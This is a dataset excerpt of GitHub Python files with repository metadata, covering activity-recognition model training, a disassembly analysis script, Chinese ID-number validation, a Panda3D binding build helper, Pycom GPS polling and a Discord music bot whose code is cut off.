blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
823a562f2701ed4bfb01d324513c92806e997c63 | 8be0a2dce4702ad31a147e79c3501d92a19037b8 | /sensor/res/activity_recognition.py | 7ae2288df12d9e3f0044c99429bf89c61a8729df | [] | no_license | geochri/Human-Activity-Recognition-final-semester-project | 24ec496958752d1f5cda981d14c9471dc0b57d45 | 4b0181bbfdd4d209670acad19294fc3a1e962495 | refs/heads/master | 2020-05-31T02:09:40.802497 | 2018-07-27T14:50:43 | 2018-07-27T14:50:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,720 | py | from pathlib import Path
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
from keras.models import Sequential
from keras.layers import Dense, Conv2D, MaxPooling2D, Flatten, Dropout
from keras import optimizers
import datetime
from functools import lru_cache
@lru_cache()
def main():
    """Train and return a CNN human-activity classifier from tracker.txt.

    Pipeline: read the accelerometer CSV, cut it into half-overlapping
    90-sample windows, one-hot-encode the per-window majority activity
    label, then fit a small Conv2D network and print the test error.

    NOTE(review): @lru_cache() on a zero-argument function only memoises
    the trained model for repeat calls within one process — confirm that
    is intentional.
    """
    random_seed = 611
    np.random.seed(random_seed)
    plt.style.use('ggplot')

    def readData(filePath):
        # attributes of the dataset
        columnNames = ['user_id', 'activity', 'timestamp', 'x-axis', 'y-axis', 'z-axis']
        data = pd.read_csv(filePath, header=None, names=columnNames, na_values=';', low_memory=False)
        return data

    def windows(data, size):
        # Yield half-overlapping [start, start+size) windows over the series.
        start = 0
        while start < data.count():
            yield int(start), int(start + size)
            start += (size / 2)

    def segment_signal(data, window_size=90):
        # Stack every complete window into (n, window_size, 3) and take the
        # modal activity of each window as its label.
        segments = np.empty((0, window_size, 3))
        labels = np.empty((0))
        for (start, end) in windows(data['timestamp'], window_size):
            x = data['x-axis'][start:end]
            y = data['y-axis'][start:end]
            z = data['z-axis'][start:end]
            if (len(data['timestamp'][start:end]) == window_size):
                segments = np.vstack([segments, np.dstack([x, y, z])])
                labels = np.append(labels, stats.mode(data['activity'][start:end])[0][0])
        return segments, labels

    # NOTE(review): hard-coded input path — breaks on any other machine.
    dataset = readData("H:/projects/8thseme/src/sensor/res/tracker.txt")
    segments, labels = segment_signal(dataset)
    labels = np.asarray(pd.get_dummies(labels), dtype=np.int8)  # one-hot encode
    numOfRows = segments.shape[1]
    numOfColumns = segments.shape[2]
    numChannels = 1
    numFilters = 128  # number of filters in Conv2D layer
    # kernal size of the Conv2D layer
    kernalSize1 = 2
    # max pooling window size
    poolingWindowSz = 2
    # number of filters in fully connected layers
    numNueronsFCL1 = 128
    numNueronsFCL2 = 128
    # split ratio for test and validation
    trainSplitRatio = 0.8
    # number of epochs
    Epochs = 10
    # batchsize
    batchSize = 10
    # number of total clases
    numClasses = labels.shape[1]
    # dropout ratio for dropout layer
    dropOutRatio = 0.2
    # reshaping the data for network input
    reshapedSegments = segments.reshape(segments.shape[0], numOfRows, numOfColumns, 1)
    # splitting in training and testing data (random boolean mask)
    trainSplit = np.random.rand(len(reshapedSegments)) < trainSplitRatio
    trainX = reshapedSegments[trainSplit]
    testX = reshapedSegments[~trainSplit]
    trainX = np.nan_to_num(trainX)
    testX = np.nan_to_num(testX)
    trainY = labels[trainSplit]
    testY = labels[~trainSplit]

    def cnnModel():
        # Build, train and evaluate the Conv2D classifier; returns the model.
        model = Sequential()
        # first convolutional layer, ReLU activation
        model.add(
            Conv2D(numFilters, (kernalSize1, kernalSize1), input_shape=(numOfRows, numOfColumns, 1), activation='relu'))
        # max-pooling layer
        model.add(MaxPooling2D(pool_size=(poolingWindowSz, poolingWindowSz), padding='valid'))
        # dropout for regularisation / over-fitting avoidance
        model.add(Dropout(dropOutRatio))
        # flatten before the fully connected layers
        model.add(Flatten())
        model.add(Dense(numNueronsFCL1, activation='relu'))
        model.add(Dense(numNueronsFCL2, activation='relu'))
        # softmax output layer for classification
        model.add(Dense(numClasses, activation='softmax'))
        adam = optimizers.Adam(lr=0.001, decay=1e-6)
        model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy'])
        for layer in model.layers:
            print(layer.name)
        model.fit(trainX, trainY, validation_split=1 - trainSplitRatio, epochs=10, batch_size=batchSize, verbose=2)
        score = model.evaluate(testX, testY, verbose=2)
        print('Baseline Error: %.2f%%' % (100 - score[1] * 100))
        return model

    model = cnnModel()
    return model
# x = 2
# while x > 1:
# prediction = model.predict(inputdata.reshape(-1, 90, 3, 1))
# labe = ['downstair', 'jogging', 'sitting', 'standing', 'upstair', 'walking']
# result = labe[np.argmax(prediction)]
# print(result)
| [
"sushil79g@gmail.com'git config --global user.name 'Sushil Ghimire'git config --global user.email sushil79g@gmail"
] | sushil79g@gmail.com'git config --global user.name 'Sushil Ghimire'git config --global user.email sushil79g@gmail |
fec017b8a3c987e59ae43429ec103b5e6a3c99d3 | 49e280f7448443a2e85609a1c21dc619c08f80e6 | /post_recent/rf_OXcase_anal.py | 112b8f66d92898c894a7448df0ec030a90d623f3 | [] | no_license | livjgovob0614/w | c9062e2b9e66b37e9b5491ef73c22fe98fdecf40 | 645c75b5009ef8368699b124eda6ec661815cd09 | refs/heads/master | 2022-12-29T12:33:55.424182 | 2020-10-12T09:44:51 | 2020-10-12T09:44:51 | 301,337,216 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,262 | py | import sys, os, glob
import subprocess
os.chdir("/home/jg/kby/disasm/output/200712_232705/")
fl= []
f = open("/home/donghoon/ssd/jg/20/learning/rf/fo", 'r')
fl.append(f.readlines())
f.close()
f = open("/home/donghoon/ssd/jg/20/learning/rf/fx", 'r')
fl.append(f.readlines())
f.close()
hexf=[]
f = open("/home/donghoon/ssd/jg/20/learning/rf/fo_hex", 'r')
hexf.append(f.readlines())
f.close()
f = open("/home/donghoon/ssd/jg/20/learning/rf/fx_hex", 'r')
hexf.append(f.readlines())
f.close()
out_f=[]
out_f.append(open("/home/donghoon/ssd/jg/20/learning/rf/result/fo_op.list", 'w'))
out_f.append(open("/home/donghoon/ssd/jg/20/learning/rf/result/fx_op.list", 'w'))
fidx = 0
for f in fl:
if fidx == 0:
fidx = 1
else:
fidx = 2
print (str(fidx)+"th try")
op_list = []
l = -1
while l < len(f)-1:
l += 1
spl = f[l].split()
st = hex(int(spl[2],16))
fn = spl[0]
print ("** new fn: " + fn)
f2 = open(fn+"/funcText", "r")
lines = f2.readlines()
f2.close
i = -1
while i < len(lines)-1:
op = []
i += 1
spl2 = lines[i].split()
try:
adr = hex(int(spl2[0].split(':')[1], 16))
except IndexError:
if len(lines[i]) < 3 or lines[i][:2] != "**":
print ("error1")
print (lines[i])
sys.exit()
continue
if st == adr:
while (True):
save_addr= 0
try:
next_adr = hex(int(lines[i+1].split()[0].split(':')[1], 16))
except IndexError:
if len(lines[i+1]) < 3 or lines[i+1][:2] != "**":
print ("error2")
print (lines[i])
sys.exit()
i += 1
continue
# ~~~ or same, but one instr function
#if fn == "libdepthcam3dmodeling_algorithm.arcsoft.so":
# print (lines[i])
if adr != next_adr or "// starts at " in lines[i+1] or "End of function" in lines[i+1]:
#if fn == "libdepthcam3dmodeling_algorithm.arcsoft.so":
# print ("out1")
# print (lines[i])
# print (lines[i+1])
break
i += 1
ex = False
## if last line, -- ##
if i == len(lines)-1:
while (True):
i -= 1
spl2 = lines[i].split()
#if len(spl2) < 2 or lines[i][22:39] != " " or lines[i][39:41] == " " or lines[i][45:51] != " ":
#### test... "not" correct? ####
if not (len(spl2) < 2 or lines[i][22:39] != " " or ((lines[i][39:41] != "DC" or lines[i][39:44] != "ALIGN") and lines[i][39:40] == " ") or "EXPORT" in lines[i][39:45]) or "WEAK" in lines[i][39:43]:
ex = True
break
if ex:
break
#print ("error3")
#print ("fn: " + fn)
#print (hex(int(lines[i-1].split()[0].split(':')[1], 16)))
#sys.exit()
# Check Operation Code
spl2 = lines[i].split()
k = 0
DCB, DCD, DCQ = 0, 0, 0
while k < 5:
op.append(spl2[1])
# test
#if op[-1] == ";" or "loc_" in op[-1]:
'''
if op[-1] == "ALIGN":
print ("err1")
print (fn)
for o in op:
print (o)
print (lines[i])
sys.exit()
'''
k += 1
# *******************************************************
# ****************** DC & ALIGN CHECK *******************
# *******************************************************
# if previous operand == DCB: 4 to 1, DCD: 1 to 1, DCQ: 1 to 2
if "ALIGN" in op[-1]:
diff = int(lines[i+1].split()[0].split(':')[1],16) - int(lines[i].split()[0].split(':')[1],16)
if diff < 4:
print("err101")
sys.exit()
if diff % 4:
print("err102")
sys.exit()
op.pop()
k -= 1
for dd in range(int(diff/4)):
# XXX op.append(''.join(hexf[fidx-1][l].split()[4*(k-1):4*k]))
op.append(''.join(hexf[fidx-1][l].split()[4*k:4*(k+1)]))
k += 1
if k == 5:
break
if "DC" in op[-1]:
spl3 = lines[i].split(',')
spl4 = lines[i].split()
add = 0
if lines[i].split()[1][:2] != "DC":
add_ = 1
if op[-1] == "DCB":
if DCB:
assert(len(spl3) == 0, "err6, fn:" + fn + "\nlines: " + lines[i])
if DCB < 4:
DCB_str += hexf[fidx-1][l].split()[4*(k-1) + DCB]
if DCB == 4:
DCB = 0
op[-1] == DCB_str
DCB_str = ""
else:
DCB += 1
k -= 1
else:
assert(False, "err7")
#print ("err6")
#sys.exit()
elif len(spl3) == 1:
DCB_str += hexf[fidx-1][l].split()[4*(k-1)]
DCB += 1
k -= 1
elif len(spl3) == 4:
op[-1] = ''.join(hexf[fidx-1][l].split()[4*(k-1):4*k])
else:
print ("err8")
sys.exit()
elif op[-1] == "DCD":
if len(spl3) == 1:
op[-1] = ''.join(hexf[fidx-1][l].split()[4*(k-1):4*k])
elif len(spl3) == 4:
print ("err100")
sys.exit()
else:
print ("err9")
sys.exit()
# DCQ #
else:
if len(spl3) == 1:
op[-1] = ''.join(hexf[fidx-1][l].split()[4*(k-1):4*k])
if k < 5:
k += 1
op.append(''.join(hexf[fidx-1][l].split()[4*(k-1):4*k]))
else:
#elif len(spl3) == 4:
op.pop()
k -= 1
while k < 5:
op.append(''.join(hexf[fidx-1][l].split()[4*k:4*(k+1)]))
k += 1
i += 1
if i == len(lines)-1:
break
# ***********************************************************************
# ****************** if function end, find next instr *******************
# ***********************************************************************
spl2 = lines[i].split()
#if len(spl2) < 2 or lines[i][22:39] != " " or lines[i][39:41] == " " or lines[i][45:51] != " ":
if len(spl2) < 2 or lines[i][22:39] != " " or ((lines[i][39:41] != "DC" or lines[i][39:44] != "ALIGN") and lines[i][39:40] == " ") or "EXPORT" in lines[i][39:45] or "WEAK" in lines[i][39:43]:
if not save_addr:
save_addr = i
# XXX newF[k-1] = 1
#while not (i == len(lines)-1 or len(spl2) < 2 or lines[i][22:39] != " " or lines[i][39:41] == " " or lines[i][45:51] != " "):
while i+1 < len(lines)-1 and (len(spl2) < 2 or lines[i][22:39] != " " or ((lines[i][39:41] != "DC" or lines[i][39:44] != "ALIGN") and lines[i][39:40] == " ") or "EXPORT" in lines[i][39:45]) or "WEAK" in lines[i][39:43]:
i+=1
spl2 = lines[i].split()
'''
if "ALIGN" in lines[i]:
print ("********ALIGN")
if (lines[i][39:40] != " "):
print ("33")
print (lines[i][39:40])
sys.exit()
if (lines[i][39:41] != "DC"):
print ("11")
sys.exit()
if (lines[i][39:41] != "DC" and lines[i][39:40] == " "):
print ("22")
sys.exit()
'''
#break
if i+1 == len(lines) -1:
break
if not op:
print ("no function start")
sys.exit()
# test
if len(op) == 1 and i+1 < len(lines)-1:
print ("err2")
print (fn)
print (op[0])
print (lines[i])
sys.exit()
if k != 5:
if i+1 < len(lines)-1:
print("err102")
sys.exit()
while k < 5:
op.append(''.join(hexf[fidx-1][l].split()[4*k:4*(k+1)]))
k += 1
add = True
for e in op_list:
if e[:-1] == op:
add = False
break
if save_addr:
i = save_addr
if add:
op.append("( "+fn + ", " + st + " )")
op_list.append(op)
if l == len(f) - 1 or f[l+1].split()[0] != fn:
break
l += 1
st = hex(int(f[l].split()[2],16))
#if fn == "libdepthcam3dmodeling_algorithm.arcsoft.so":
# print ("new st:", st)
op_list.sort()
for op in op_list:
for n in op:
if n == op[-1]:
out_f[fidx-1].write(" "+n)
else:
out_f[fidx-1].write("{:10}".format(n))
#out_f.write('\t\t'.join(op))
out_f[fidx-1].write("\n")
print (len(op_list))
out_f[fidx-1].close()
| [
"livjgovob@gmail.com"
] | livjgovob@gmail.com |
3438b512d8bdf0925ccf403bdf6ab92e99dacd88 | 50e475c7387dabf05a8b30fbed260e3e2e8d5fc2 | /src/id_query.py | 716387da822d6c9c6a28eef0125bbbed5bc7142d | [] | no_license | pacopink/mca_district_code | 8b5bd078313d6cf3c29da9075799795ffa037ba8 | 29a2f3f1f1019fd2b870e635911b36bf78bf35d2 | refs/heads/main | 2022-12-27T14:18:50.892298 | 2020-10-16T14:53:03 | 2020-10-16T14:53:03 | 302,510,378 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,243 | py | #!/usr/bin/env python3
import re
from data_struct import DistrictCodeDate, IdInfo, DISTRICT_CODE_FILE
# Lookup tables for 18-digit mainland-China ID parsing.
genders = ('女', '男')  # indexed by parity of the 17th digit: even → female, odd → male
r = re.compile(r'\d{17}[0-9X]')  # 17 digits followed by a digit or 'X' check character
factors = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]  # per-position checksum weights
expects = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']  # weighted-sum mod 11 → check char
def get_code_map():
    """Load the district-code CSV into a dict keyed by 6-digit district code.

    Skips '#' comment lines and any row whose field count does not match
    DistrictCodeDate; returns {code: DistrictCodeDate}.
    """
    h = {}
    with open(DISTRICT_CODE_FILE, "r", encoding='utf8') as f:
        for l in f:
            if l[0] == "#":
                continue
            l = l.strip()
            v = l.split(",")
            if len(v) != len(DistrictCodeDate._fields):
                continue
            dist = DistrictCodeDate(*v)
            h[dist.code] = dist
    return h
def _district_lookup():
    """Closure: load the code map once and reuse it for every lookup."""
    h = get_code_map()
    # Key the lookup on the first 6 characters (the district code).
    return lambda c: h.get(c[0:6])


# Module-level lookup function bound to the cached map.
district_lookup = _district_lookup()
def get_gender(code):
    """Return '男' (odd 17th digit) or '女' (even) for an 18-char ID string."""
    # Rule inlined from the module-level ``genders`` tuple: the 17th
    # character (index 16) encodes gender by parity.
    return '男' if int(code[16:17]) % 2 else '女'
def checksum(code):
    """Compute the check character for the first 17 digits of *code*.

    Weighted sum of the 17 digits modulo 11, mapped through the standard
    check-character table (zip truncates any extra characters).
    """
    factors = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
    expects = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
    index = sum(factor * int(digit) for factor, digit in zip(factors, code)) % len(expects)
    return expects[index]
def id_validation_check(code):
    """Return True when *code* passes the 18-char ID pattern and checksum.

    Prints a diagnostic and returns False on either failure.  Note the
    pattern is anchored only at the start, matching the original
    behaviour (trailing characters after position 18 are ignored).
    """
    if re.match(r'\d{17}[0-9X]', code) is None:
        print("invalid code pattern")
        return False
    expected_cksum = checksum(code)
    # Compare the computed check character with the actual 18th character.
    if code[17] == expected_cksum:
        return True
    print("checksum failed: expect=", expected_cksum, "but actual:", code[17])
    return False
def parse_id(code, name='NA'):
    """Validate *code* and return an IdInfo record, or None when invalid."""
    if not id_validation_check(code):
        return None
    dist = district_lookup(code)
    gender = get_gender(code)
    # Characters 7-14 (code[6:14]) carry the YYYYMMDD birth date.
    return IdInfo(name=name, code=code, validity=True, gender=gender, district_info=dist, birthday=code[6:14])
if __name__ == '__main__':
    # Interactive loop: look up ID numbers until the user quits.
    while True:
        code = input("请输入要查询的身份证号码: ")
        code = code.upper()
        if code.lower() in ("quit", "exit", "q"):
            print("good bye")
            break
        info = parse_id(code)
        if info is None:
            print("非法的身份证号码,无法查询!")
        else:
            print("查询成功!结果:\n", info)
"13602887904@163.com"
] | 13602887904@163.com |
187e3394d0b6b0785bd669990a1261ab0b325a6a | 9827506feaa1655c68ad88bf685ccce03d02a686 | /venv/lib/python3.6/enum.py | 42e7f3ca31565192c6da84c93a5785016df1ca0c | [] | no_license | taixingbi/django-postgres-config | 9ea53b0c117aa34605b27c9a9b06fb8cbb57669c | 00309dbe29ea528d94c00c6e6dea4ececde54d2d | refs/heads/master | 2020-04-11T17:00:51.890200 | 2018-12-15T21:32:26 | 2018-12-15T21:32:26 | 161,945,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40 | py | /Users/h/anaconda3/lib/python3.6/enum.py | [
"bitaihang@gmail.com"
] | bitaihang@gmail.com |
caea2ec58c57adbd5f5dc9e9a63d8dc2b3c96220 | 85d41b34a472a2ec726b6fe9ebccc19a75159641 | /src/run_interrogate.py | c9fd70730d2eb2e009a3c248d42ab3bec617022d | [] | no_license | toontownretro/libotp | 186dacbe920b39a44840cc568cd76f1ea87ebd03 | 1ddfbd6526e88e887468c3c517a5d07dbc6e59be | refs/heads/master | 2022-12-19T10:55:28.239247 | 2020-09-14T00:59:03 | 2020-09-14T00:59:03 | 245,036,965 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,661 | py | import subprocess
import glob
import sys
import os
# Directory containing this script, and the Panda3D install root (argv[1]).
srcdir = os.path.abspath(os.path.dirname(__file__))
pandadir = os.path.abspath(sys.argv[1])
def run_command(cmd):
    """Run *cmd* through the shell, streaming output; exit on failure.

    The process inherits stdout/stderr; a non-zero exit status aborts the
    whole build with that status.
    """
    p = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr, shell=True)
    ret = p.wait()
    if ret != 0:
        print("\n")
        print('The following command return a non-zero value (%d): %s' % (ret, cmd))
        sys.exit(ret)
def interrogate(module):
    """Generate Interrogate Python bindings for one libotp sub-module.

    Builds the interrogate command line (include paths, defines, output
    files), appends every .h/.cxx file in the module directory, then runs it.
    """
    print('Interrogating', module)
    cmd = os.path.join(pandadir, 'bin', 'interrogate')
    cmd += ' -D__inline -DCPPPARSER -DP3_INTERROGATE=1 -D__cplusplus -fnames -string -refcount -assert'
    cmd += ' -S"%(pandadir)s/include/parser-inc" -S"%(pandadir)s/include" -I"%(pandadir)s/include" -I"%(srcdir)s/movement" -I"%(srcdir)s/nametag"'
    cmd += ' -I"%(srcdir)s/otpbase"'
    cmd += ' -srcdir "%(srcdir)s/%(module)s"'
    cmd += ' -oc "%(srcdir)s/%(module)s_igate.cxx" -od "%(srcdir)s/lib%(module)s.in" -python-native -DCPPPARSER -D__STDC__=1'
    cmd += ' -D__cplusplus -D__inline -D_X86_ -DWIN32_VC -DWIN32 -module libotp -library %(module)s -Dvolatile='
    cmd = cmd % {'pandadir': pandadir, 'module': module, 'srcdir': srcdir}
    files = glob.glob(os.path.join(srcdir, module, '*.h'))
    files += glob.glob(os.path.join(srcdir, module, '*.cxx'))
    for file in files:
        cmd += ' %s' % os.path.basename(file)
    run_command(cmd)
# Interrogate each sub-module, then merge the .in files into one
# libotp Python module with interrogate_module.
for module in ('movement', 'nametag'):
    interrogate(module)

os.chdir(srcdir)
cmd = os.path.join(pandadir, 'bin', 'interrogate_module') + ' -python-native -oc libotp_module.cxx'
cmd += ' -library libotp -module libotp libnametag.in libmovement.in'
run_command(cmd)
| [
"theclashingfritz@users.noreply.github.com"
] | theclashingfritz@users.noreply.github.com |
20fb6e8a4c8e239643488306cfbb45e6487fd668 | e2227cd3f37d0b2fa2520ea83735b057c506d51e | /LoraFTP/gps.py | 6d8eb18a893c27fd8f10c6a2a79f3beace87796a | [] | no_license | megachonker/LoRa | 49b8b87f6609462d0f33464692e928ac25cdbd60 | 0e5419bc00324675bd17257b255cb40b5c3959c0 | refs/heads/master | 2023-02-19T12:17:38.746441 | 2021-01-11T00:54:35 | 2021-01-11T00:54:35 | 271,270,687 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 627 | py | import machine # pour pouvoir géré des fichier
import pycom # pour le gestion du module pycom (dans notre cas la led)
import time # pour la gestion des temps d'attente
from L76GNSS import L76GNSS # pour le module gps
from pytrack import Pytrack # shield du modul gps
import _thread
py = Pytrack() # initialise the Pytrack expansion board
l76 = L76GNSS(py, timeout=5) # initialise the L76 GNSS (GPS) receiver
time.sleep(2) # brief settle delay before first use
coord=()  # latest GPS fix, refreshed in the background by listenGPS
def listenGPS():
    """Poll the L76 receiver forever, publishing fixes into global ``coord``."""
    global coord
    while True:
        coord = l76.coordinates()  # fetch the current GPS coordinates
_thread.start_new_thread(listenGPS,())
| [
""
] | |
5c60b907ad1b0faa3946a538521a15f672150fa2 | dbfa92bfa039c61268ed1d84b8fd67435a0fa25e | /main.py | b328fa7e858060db4e40f1d64d61a3ac90e180cd | [] | no_license | kravtandr/RACHKO_BOT | 9373c76ea7752c8e63c9460c71d243008e94e25a | 0e76befba8258c8437d8e84df03921ed55380231 | refs/heads/master | 2023-02-13T01:42:37.542818 | 2021-01-21T18:39:11 | 2021-01-21T18:39:11 | 280,113,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,274 | py | """
The MIT License (MIT)
Copyright (c) 2020 kravtandr
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import random
import discord
import asyncio
from discord.ext import tasks, commands
import youtube_dl
# Read the bot token from cfg.txt: the third whitespace-separated field
# of the first line (expected form: "TOKEN = <value>").
with open('cfg.txt', 'r') as f:
    for i, line in enumerate(f):
        if i == 0:
            TOKEN = line.split()[2]
#TOKEN = 'token'
# Suppress noise about console usage from errors
youtube_dl.utils.bug_reports_message = lambda: ''
ytdl_format_options = {
'format': 'bestaudio/best',
'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',
'restrictfilenames': True,
'noplaylist': True,
'nocheckcertificate': True,
'ignoreerrors': False,
'logtostderr': False,
'quiet': True,
'no_warnings': True,
'default_search': 'auto',
'source_address': '0.0.0.0' # bind to ipv4 since ipv6 addresses cause issues sometimes
}
ffmpeg_options = {
'options': '-vn'
}
ytdl = youtube_dl.YoutubeDL(ytdl_format_options)
class YTDLSource(discord.PCMVolumeTransformer):
    """Volume-controlled audio source built from a youtube-dl download."""

    def __init__(self, source, *, data, volume=0.5):
        super().__init__(source, volume)
        self.data = data  # raw youtube-dl info dict
        self.title = data.get('title')
        self.url = data.get('url')

    @classmethod
    async def from_url(cls, url, *, loop=None, stream=False):
        """Resolve *url* with youtube-dl (off the event loop) and wrap it
        in an FFmpeg source.  When *stream* is False the file is downloaded
        first and played from disk."""
        loop = loop or asyncio.get_event_loop()
        data = await loop.run_in_executor(None, lambda: ytdl.extract_info(url, download=not stream))
        if 'entries' in data:
            # take first item from a playlist
            data = data['entries'][0]
        filename = data['url'] if stream else ytdl.prepare_filename(data)
        # NOTE(review): hard-coded Windows ffmpeg path — breaks elsewhere.
        return cls(discord.FFmpegPCMAudio(filename, **ffmpeg_options,
                                          executable="C:/Users/User/PycharmProjects/RACHKO_BOT/ffmpeg/bin/ffmpeg.exe"), data=data)
class MyContext(commands.Context):
    """Context subclass adding a tick/cross reaction helper."""

    async def tick(self, value):
        # React to the invoking message: green check mark when *value* is
        # truthy, red cross mark otherwise.
        emoji = '\N{WHITE HEAVY CHECK MARK}' if value else '\N{CROSS MARK}'
        try:
            # this will react to the command author's message
            await self.message.add_reaction(emoji)
        except discord.HTTPException:
            # Missing permissions etc. are non-fatal for a cosmetic reaction.
            pass
class MyBot(commands.Bot):
    # NOTE(review): mutable playback state is kept as *class* attributes,
    # shared by every instance — works here only because a single bot is
    # ever created.
    vc = "0"           # sentinel for "not connected"; replaced by a VoiceClient after !join
    last_ctx = None    # last command context, reused by the background player loop
    is_looped = False  # repeat-current-track flag
    curr_track = None  # URL of the track currently playing
    queue = []         # display mirror of the async queue (see queue_async)
    queue_size = 0

    async def get_context(self, message, *, cls=MyContext):
        # Hand our MyContext subclass to the default machinery so every
        # command invocation gets the tick() helper.
        return await super().get_context(message, cls=cls)
#bot = commands.Bot(command_prefix='!', description="description")
bot = MyBot(command_prefix='!', description="RACHKO-BOT")  # the single bot instance
queue_async = asyncio.Queue()  # real playback queue; bot.queue only mirrors it for display
bot.remove_command('help')  # replaced by the custom !help command below
#ctx.bot.loop.create_task(self.player_loop())
class MyCog(commands.Cog):
    """Watchdog cog: every 5 s decide whether to repeat or advance playback."""

    def __init__(self, bot):
        self.bot = bot
        self.index = 0
        self.player.start()  # kick off the background loop immediately

    def cog_unload(self):
        print("cog_unload")
        self.player.cancel()

    @tasks.loop(seconds=5.0)  # main loop
    async def player(self):
        playing = None
        paused = None
        print("is_closed - " + str(bot.is_closed()))
        if not bot.is_closed():
            # check if playing track and connected
            # NOTE(review): assumes bot.vc is a VoiceClient here; if the bot
            # never connected, bot.vc is still the "0" sentinel — confirm.
            playing = bot.vc.is_playing()
            paused = bot.vc.is_paused()
            print("vc.is_connected() - " + str(bot.vc.is_connected()))
            print("vc.is_playing()) - " + str(playing))
            print("Status: ", end="")
            if playing or paused:
                print("playing...")
            else:
                if bot.is_looped:
                    # repeat the current track
                    await play(ctx=bot.last_ctx, url=bot.curr_track)
                    print("repeating " + str(bot.curr_track))
                else:
                    print("not playing")
                    # check if we have a next track queued
                    if have_next():
                        print("play next song")
                        print("getting ctx...")
                        ctx = bot.last_ctx
                        print("got ctx " + str(ctx))
                        await next(ctx)
                    else:
                        print("No next song")
        print("-----------------------------------------")

    @player.before_loop
    async def before_printer(self):
        # Hold the loop until the bot is fully connected.
        print('waiting... for bot ready')
        await self.bot.wait_until_ready()
def have_next():
    """Return True when at least one track is waiting in the async queue."""
    return queue_async.qsize() > 0
async def setup():
    """Attach the watchdog cog (called once the first track is queued)."""
    print("setup")
    bot.add_cog(MyCog(bot))
@bot.command(pass_context=True)
async def music(ctx, num=3):
    """Build a playlist of *num* random tracks drawn from music_base.txt.

    Repeatedly scans the history file for randomly chosen line indices,
    queues each pick, then starts playback with the first one.
    NOTE(review): the random index-scan with rewinds can loop for a long
    time on large/odd history files — confirm acceptable.
    """
    i = 0
    count = 0
    all_found = False
    nLines = count_lines("music_base.txt")
    print("LINES = ", nLines)
    while not all_found:
        f = open('music_base.txt', 'r')
        rand = random.randint(0, nLines)
        start = random.randint(0, rand)
        for line in f:
            line = line.strip()
            print("i= " + str(i), "count = " + str(count), start, rand)
            if line.isspace():
                print("seek 0")
                f.seek(0)
            if i >= start and i == rand:
                if count < int(num):
                    # Take this line as the next random pick and re-roll.
                    bot.queue.append(line)
                    await queue_async.put(line)
                    print("+ in q " + str(line))
                    bot.queue_size += 1
                    count += 1
                    rand = random.randint(0, nLines)
                    start = random.randint(0, rand)
                    i = 0
                else:
                    # Enough picks gathered: start playing the first one.
                    print("all found")
                    line = await queue_async.get()
                    await play(ctx=ctx, url=line)
                    await queue(ctx)
                    all_found = True
                    return
            else:
                print("i < start and i != rand")
                if i < start or i > nLines:
                    i = start
                print("i = ", i," count = ", count)
                print("start = ", start, " rand = ", rand)
            i += 1
        i = 0
        f.close()
@bot.command(pass_context=True)
async def help(ctx):
    """Send the command reference (the built-in help command was removed)."""
    await ctx.send("```!help - помощь\n"
                   "!play - аудио из вк или yt, если уже что-то играет, то трек добавляется в очередь. \n "
                   " (стримы не работают, тк все файлы перед воспроизведением скачиваются)\n"
                   "!music <число треков> - создает плейлист из треков, которые уже играли, по умолчанию размер плейлиста = 3\n"
                   "!loop - вкл/выкл повтор\n"
                   "!queue - выводит в текстовый канал текущий плейлист\n"
                   "!pause - поставить на паузу аудио\n"
                   "!resume - продолжить воспроизведение\n"
                   "!next - следующий трек в очереди\n"
                   "!cur - текущий трек\n"
                   "!clear - очищает плейлист\n"
                   "!disconnect - отключиться из голосового канала\n"
                   "!stop - остановить воспроизведение аудио\n"
                   "=======================================dev================================================================\n"
                   "!format_music_base - удаляет одинаковые треки из базы```")
@bot.command(pass_context=True)
async def loop(ctx):
    """Toggle repeat of the current track."""
    bot.is_looped = not bot.is_looped
